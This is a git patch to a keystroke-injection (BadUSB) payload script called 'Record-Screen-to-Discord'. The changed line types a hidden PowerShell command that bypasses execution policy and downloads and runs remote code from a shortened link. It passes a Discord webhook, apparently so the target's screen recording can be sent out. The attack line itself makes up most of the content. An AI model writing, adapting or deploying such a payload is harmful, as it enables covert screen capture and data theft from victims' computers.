From 18226c04b4cb738b2c7da58cbaeda198e2e12696 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 11 Apr 2024 21:38:05 +0000 Subject: [PATCH] Update Record-Screen-to-Discord.txt --- Record-Screen-to-Discord/Record-Screen-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Record-Screen-to-Discord/Record-Screen-to-Discord.txt b/Record-Screen-to-Discord/Record-Screen-to-Discord.txt index 53bcabf..3f11045 100644 --- a/Record-Screen-to-Discord/Record-Screen-to-Discord.txt +++ b/Record-Screen-to-Discord/Record-Screen-to-Discord.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm URL | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwscreendc | iex ENTER